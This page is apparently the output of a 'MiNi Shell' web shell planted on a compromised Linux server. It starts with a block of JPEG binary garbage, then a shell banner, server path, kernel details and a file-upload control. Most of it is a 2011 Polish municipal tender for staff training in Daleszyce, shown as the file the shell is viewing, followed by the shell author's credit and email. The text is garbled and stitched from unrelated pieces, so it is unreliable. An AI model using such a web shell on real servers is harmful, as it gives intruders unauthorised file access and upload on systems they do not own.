JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111114/377438-N-2011.html

<p class="kh_header"><b>Daleszyce: Organizacja szkoleń w ramach projektu pn. Profesjonalny urząd gwarancją rozwoju regionu, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, na podstawie umowy nr UDA-POKL.05.02.01-00-065/11-00</b><br>
<b>Numer ogłoszenia: 377438 - 2011; data zamieszczenia: 14.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Daleszyce , pl. Staszica 9, 26-021 Daleszyce, woj. świętokrzyskie, tel. 0-41 3171693, faks 0-41 3171693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.daleszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja szkoleń w ramach projektu pn. Profesjonalny urząd gwarancją rozwoju regionu, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, na podstawie umowy nr UDA-POKL.05.02.01-00-065/11-00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: 
Zamówienie obejmuje organizację szkoleń dla pracowników Urzędu Miasta i Gminy Daleszyce. 
W ramach kosztów wynagrodzenia Wykonawca zapewni: 
dla szkoleń jednodniowych - czas szkolenia min. 8 godzin lekcyjnych (45 min.), 2 trenerów do wyboru, materiały szkoleniowe w wersji papierowej i elektronicznej (dla każdego uczestnika), klimatyzowaną salę, 4 przerwy kawowe, obiad;
dla szkoleń dwudniowych - czas szkolenia min. 16 godzin lekcyjnych (45 min.), 2 trenerów do wyboru, materiały szkoleniowe w wersji papierowej i elektronicznej (dla każdego uczestnika), klimatyzowaną salę, 4 przerwy kawowe w trakcie każdego dnia szkoleniowego, nocleg w pokojach co najwyżej 2 osobowych w obiekcie 
o standardzie co najmniej trzygwiazdkowym, 2 obiady, 1 śniadanie i 1 kolację, w przypadku zajęć warsztatowych grupy co najmniej 10 osobowe (dla każdej moderator); 
dla szkolenia trzydniowego - czas szkolenia min. 24 godziny lekcyjne (45 min.), materiały szkoleniowe w wersji papierowej i elektronicznej (dla każdego uczestnika), klimatyzowaną salę, 4 przerwy kawowe w trakcie każdego dnia szkoleniowego, 2 noclegi w pokojach co najwyżej 2 osobowych w obiekcie o standardzie co najmniej trzygwiazdkowym, 3 obiady, 2 śniadania i 2 kolacje, w przypadku zajęć warsztatowych grupy co najmniej 10 osobowe (dla każdej moderator).
Wszystkie materiały oraz dokumentacja szkoleniowa winny być oznaczone zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
Szczegółowy termin szkoleń ustalony zostanie pomiędzy Zamawiającym i Wykonawcą na min. 7 dni przed organizacją poszczególnych szkoleń. 
Szkolenia powinny odbywać się możliwie najbliżej siedziby Zamawiającego, przy czym, jeśli w szkoleniu bierze udział min. 9 pracowników szkolenie powinno odbyć na terenie Gminy Daleszyce (szkolenia nr: 4, 9, 10, 11, 13, 18). Szkolenie nr 12 powinno być szkoleniem wyjazdowym.
Wykaz szkoleń z zakresu Usług szkolenia specjalistycznego oraz szkolenia personelu:
1.Szkolenie: Zarządzanie ryzykiem finansowym, 
po 2 szkolenia dwudniowe (wykład/warsztat) dla 4 osób z 2 różnymi prowadzącymi
- szkolenie 1 dla 2 osób w 2011r., 
- szkolenie 2 dla 2 osób w I połowie 2012r., 
- szkolenie 3 dla 2 osób w II połowie 2012r., 
- szkolenie 4 dla 2 osób w I połowie 2013r.,
2.Szkolenie: Procedury zamówień publicznych, 
po 4 szkolenia dwudniowe (wykład/warsztat) dla 2 osób  z różnymi prowadzącymi 
- szkolenie 1 dla 2 osób w 2011r., 
- szkolenie 2 dla 2 osób w I połowie 2012r., 
- szkolenie 3 dla 2 osób w II połowie 2012r., 
- szkolenie 4 dla 2 osób w I połowie 2013r.,
3.Szkolenie: Partnerstwo publiczno prywatne, 
po 2 szkolenia jednodniowe (wykład) dla 11 osób z różnymi prowadzącymi 
- szkolenie 1 dla 6 osób w 2011r., 
- szkolenie 2 dla 5 osób w I połowie 2012r.,
- szkolenie 3 dla 6 osób w II połowie 2012r.,
- szkolenie 4 dla 5 osób w I połowie 2013r.,
4.Szkolenie: Tworzenie aktów prawa miejscowego, 
po 2 szkolenia jednodniowe (wykład) dla 11 osób z różnymi prowadzącymi 
- szkolenie 1 dla 11 osób w 2011r., 
- szkolenie 2 dla 11 osób w 2012r., 
5.Szkolenie: Pozyskiwanie środków zewnętrznych i efektywne zarządzanie projektem, 
po 3 szkolenia dwudniowe (wykład/warsztat) dla 6 osób z różnymi prowadzącymi 
- szkolenie 1 dla 6 osób w 2011r., 
- szkolenie 2 dla 6 osób w I połowie 2012r., 
- szkolenie 3 dla 6 osób w II połowie 2012r., 
6.Szkolenie: Zarządzanie strategiczne w administracji, 
po 4 szkolenia dwudniowe (wykład/warsztat) dla 5 osób z różnymi prowadzącymi 
- szkolenie 1 dla 5 osób w 2011r., 
- szkolenie 2 dla 5 osób w I połowie 2012r., 
- szkolenie 3 dla 5 osób w II połowie 2012r., 
- szkolenie 4 dla 5 osób w I połowie 2013r., 
7.Szkolenie: Prince2 Fundation, 
szkolenie trzydniowe zakończone egzaminem (wykład/warsztat) dla 6 osób 
- szkolenie dla 6 osób w 2012r.,
8.Szkolenie: Prince2 Practitioner, 
szkolenie dwudniowe zakończone egzaminem (wykład/warsztat) dla 4 osób 
- szkolenie dla 4 osób w I połowie 2013r.,
9.Szkolenie: Leadership - przywództwo, 
po 2 szkolenia jednodniowe (wykład/warsztat) dla 9 osób z różnymi prowadzącymi 
- szkolenie 1 dla 9 osób w 2011r., 
- szkolenie 2 dla 9 osób w 2012r., 
10.Szkolenie: KPA w praktyce, 
po 1 szkoleniu jednodniowym (wykład/warsztat) dla 20 osób 
- szkolenie 1 dla 10 osób w 2011r., 
- szkolenie 2 dla 10 osób w 2012r., 
11.Szkolenie: Profesjonalna obsługa klienta, 
po 1 szkoleniu jednodniowym (wykład/warsztat) dla 20 osób
- szkolenie 1 dla 10 osób w 2011r., 
- szkolenie 2 dla 10 osób w 2012r., 
12.Szkolenie: Integracja i motywacja pracowników, 
dwudniowe szkolenie na weekend dla wszystkich pracowników UMiG w Daleszycach (44 osoby), 
- szkolenie w 2011r.,
13.Szkolenie: Współpraca urzędu z organizacjami pozarządowymi, 
po 2 szkolenia jednodniowe (wykład) dla 10 osób z różnymi prowadzącymi
- szkolenie 1 dla 10 osób w 2012r., 
- szkolenie 2 dla 10 osób w I połowie 2013r., 
14.Szkolenie: Ochrona danych osobowych, 
szkolenie jednodniowe (wykład) dla 4 osób 
- szkolenie dla 4 osób w 2012r.,
15.Szkolenie: Planowanie strategiczne w samorządzie, 
po 3 szkolenia dwudniowe (wykład/warsztat) dla 5 osób z różnymi prowadzącymi
- szkolenie 1 dla 5 osób w I połowie 2012r, 
- szkolenie 2 dla 5 osób w II połowie 2012r, 
- szkolenie 3 dla 5 osób w I połowie 2013r, 
16.Szkolenie: Ochrona środowiska - obowiązki i prawa jst, 
szkolenie jednodniowe (wykład) dla 2 osób 
- szkolenie dla 2 osób w I połowie 2013r.,
17.Szkolenie: Budżet i wieloletnia prognoza finansowa, 
po 2 szkolenia jednodniowe (wykład/warsztat) dla 2 osób z różnymi prowadzącymi
- szkolenie 1 dla 2 osób w I połowie 2012r.,
- szkolenie 2 dla 2 osób w II połowie 2012r.,
18.Szkolenie z zakresu obsługi elektronicznej skrzynki podawczej, 
po 1 szkoleniu jednodniowym (warsztat) dla 40 osób 
- szkolenie 1 dla 10 osób w 2011r, 
- szkolenie 2 dla 10 osób w I połowie 2012r, 
- szkolenie 3 dla 10 osób w II połowie 2012r, 
- szkolenie 4 dla 10 osób w I połowie 2013r,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.51.10.00-9, 80.53.20.00-2, 80.54.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1)posiadania wiedzy i doświadczenia, - wykaz wykonanych z ostatnich 3 lat usług szkoleniowych (minimum 5 usług) w przedmiocie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadający swoim zakresem usługom stanowiącym przedmiot zamówienia z podaniem przedmiotu, daty wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie (zał. nr 5). Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunek określony w niniejszym pkt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował odpowiednimi osobami, które będą uczestniczyć w wykonaniu zamówienia, tj. minimum dwoma trenerami posiadającymi wykształcenie wyższe, z których każdy przeprowadził szkolenia, z co najmniej 5 różnych tematów z zakresu będącego przedmiotem zamówienia oraz posiada, co najmniej 3 letnie doświadczenie, jako trener.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.daleszyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Daleszyce,   26-021 Daleszyce Pl. Staszica 9 pok. 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2011 godzina 10:00, miejsce: Urząd Miasta i Gminy Daleszyce,   26-021 Daleszyce Pl. Staszica 9 pok. 25 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany z Europejskiego Funduszu  Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com